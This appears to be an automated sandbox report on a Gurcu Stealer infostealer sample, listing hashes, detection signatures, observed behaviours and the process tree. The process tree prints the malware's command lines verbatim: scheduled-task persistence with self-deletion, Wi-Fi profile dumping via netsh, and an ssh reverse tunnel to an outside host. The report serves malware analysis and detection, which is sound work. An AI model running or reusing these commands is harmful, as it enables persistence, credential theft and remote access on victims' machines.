Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
06-10-2023 16:24
Behavioral task
behavioral1
Sample
NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Resource
win10v2004-20230915-en
General
-
Target
NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
-
Size
225KB
-
MD5
1edb8aa1adacda31bc98064b1634ddea
-
SHA1
7dc5aee1dd577b61a41a5001d465f0606bb33618
-
SHA256
fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
-
SHA512
26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
SSDEEP
3072:GQ2NGV19gqU3pJpfYTCOoShKmECPTKBWFPkl6WQre9Q29bSHXGhrD9HA2AF+q73o:uGDCOoSEmkWeILe9z9bS30AzHe0
Malware Config
Signatures
-
Detect Gurcu Stealer V3 payload 7 IoCs
resource yara_rule behavioral1/memory/2452-0-0x0000000000F90000-0x0000000000FCE000-memory.dmp family_gurcu_v3 behavioral1/memory/2452-2-0x000000001B190000-0x000000001B210000-memory.dmp family_gurcu_v3 behavioral1/files/0x000d00000001224c-7.dat family_gurcu_v3 behavioral1/files/0x000d00000001224c-8.dat family_gurcu_v3 behavioral1/memory/2140-9-0x00000000000F0000-0x000000000012E000-memory.dmp family_gurcu_v3 behavioral1/files/0x000d00000001224c-128.dat family_gurcu_v3 behavioral1/memory/2976-130-0x000000001B180000-0x000000001B200000-memory.dmp family_gurcu_v3 -
Deletes itself 1 IoCs
pid Process 2004 cmd.exe -
Executes dropped EXE 4 IoCs
pid Process 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 2392 ssh.exe 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 2804 ssh.exe -
Loads dropped DLL 2 IoCs
pid Process 2392 ssh.exe 2804 ssh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2624 schtasks.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2600 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2452 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Token: SeDebugPrivilege 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe Token: SeDebugPrivilege 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2452 wrote to memory of 2004 2452 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 28 PID 2452 wrote to memory of 2004 2452 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 28 PID 2452 wrote to memory of 2004 2452 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 28 PID 2004 wrote to memory of 2636 2004 cmd.exe 30 PID 2004 wrote to memory of 2636 2004 cmd.exe 30 PID 2004 wrote to memory of 2636 2004 cmd.exe 30 PID 2004 wrote to memory of 2600 2004 cmd.exe 31 PID 2004 wrote to memory of 2600 2004 cmd.exe 31 PID 2004 wrote to memory of 2600 2004 cmd.exe 31 PID 2004 wrote to memory of 2624 2004 cmd.exe 32 PID 2004 wrote to memory of 2624 2004 cmd.exe 32 PID 2004 wrote to memory of 2624 2004 cmd.exe 32 PID 2004 wrote to memory of 2140 2004 cmd.exe 33 PID 2004 wrote to memory of 2140 2004 cmd.exe 33 PID 2004 wrote to memory of 2140 2004 cmd.exe 33 PID 2140 wrote to memory of 2664 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 34 PID 2140 wrote to memory of 2664 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 34 PID 2140 wrote to memory of 2664 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 34 PID 2664 wrote to memory of 2508 2664 cmd.exe 36 PID 2664 wrote to memory of 2508 2664 cmd.exe 36 PID 2664 wrote to memory of 2508 2664 cmd.exe 36 PID 2664 wrote to memory of 2544 2664 cmd.exe 38 PID 2664 wrote to memory of 2544 2664 cmd.exe 38 PID 2664 wrote to memory of 2544 2664 cmd.exe 38 PID 2664 wrote to memory of 2568 2664 cmd.exe 37 PID 2664 wrote to memory of 2568 2664 cmd.exe 37 PID 2664 wrote to memory of 2568 2664 cmd.exe 37 PID 2140 wrote to memory of 2552 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 39 PID 2140 wrote to memory of 2552 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 39 PID 2140 wrote to memory of 2552 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 39 PID 2552 wrote to memory of 2752 2552 cmd.exe 41 PID 2552 wrote to memory of 2752 2552 cmd.exe 41 PID 2552 wrote to memory of 2752 2552 cmd.exe 41 PID 2552 wrote to memory of 1192 2552 cmd.exe 42 PID 2552 wrote to memory of 1192 2552 cmd.exe 42 PID 2552 wrote to memory of 1192 2552 cmd.exe 42 PID 2552 wrote to memory of 2236 2552 cmd.exe 43 PID 2552 wrote to memory of 2236 2552 cmd.exe 43 PID 2552 wrote to memory of 2236 2552 cmd.exe 43 PID 2140 wrote to memory of 2392 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 45 PID 2140 wrote to memory of 2392 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 45 PID 2140 wrote to memory of 2392 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 45 PID 2140 wrote to memory of 2392 2140 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 45 PID 676 wrote to memory of 2976 676 taskeng.exe 50 PID 676 wrote to memory of 2976 676 taskeng.exe 50 PID 676 wrote to memory of 2976 676 taskeng.exe 50 PID 2976 wrote to memory of 2272 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 51 PID 2976 wrote to memory of 2272 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 51 PID 2976 wrote to memory of 2272 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 51 PID 2272 wrote to memory of 1796 2272 cmd.exe 53 PID 2272 wrote to memory of 1796 2272 cmd.exe 53 PID 2272 wrote to memory of 1796 2272 cmd.exe 53 PID 2272 wrote to memory of 1804 2272 cmd.exe 54 PID 2272 wrote to memory of 1804 2272 cmd.exe 54 PID 2272 wrote to memory of 1804 2272 cmd.exe 54 PID 2272 wrote to memory of 1916 2272 cmd.exe 55 PID 2272 wrote to memory of 1916 2272 cmd.exe 55 PID 2272 wrote to memory of 1916 2272 cmd.exe 55 PID 2976 wrote to memory of 2704 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 56 PID 2976 wrote to memory of 2704 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 56 PID 2976 wrote to memory of 2704 2976 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe 56 PID 2704 wrote to memory of 2624 2704 cmd.exe 58 PID 2704 wrote to memory of 2624 2704 cmd.exe 58 PID 2704 wrote to memory of 2624 2704 cmd.exe 58 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2600
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2624
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2508
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:2568
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2752
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵PID:1192
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:5288 serveo.net4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2392
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D1102C16-33BB-4BCE-8858-8378CA2BEA5E} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exeC:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2976 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:1796
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1804
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵PID:1916
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:2624
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵PID:2152
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"4⤵PID:2596
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:5288 serveo.net3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2804
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
393B
MD518015a60cd12f33648facec1263cfafa
SHA131b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA2569ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925
-
C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Filesize225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Filesize225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
C:\Users\Admin\AppData\Local\WindowsSecurity\NEAS.fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575exe_JC.exe
Filesize225KB
MD51edb8aa1adacda31bc98064b1634ddea
SHA17dc5aee1dd577b61a41a5001d465f0606bb33618
SHA256fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575
SHA51226601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a
-
Filesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
4B
MD58859a81bd114df94d9f432350c934f4a
SHA1a7ae8d1e41c691a72f9f746c3dc482182001a7f7
SHA25661f5643dedd8af708aa354259f12823ba214225568fbd9e30122c35e01c91b76
SHA512312958e7d39037e847f015c68b93517b2c013960b7cc1f455b05bfbf8b64d2cadefca44e4bffef2a034f3371bfb733fda3c7c6ab605e9869991ec719b6fdfa9f
-
Filesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
Filesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c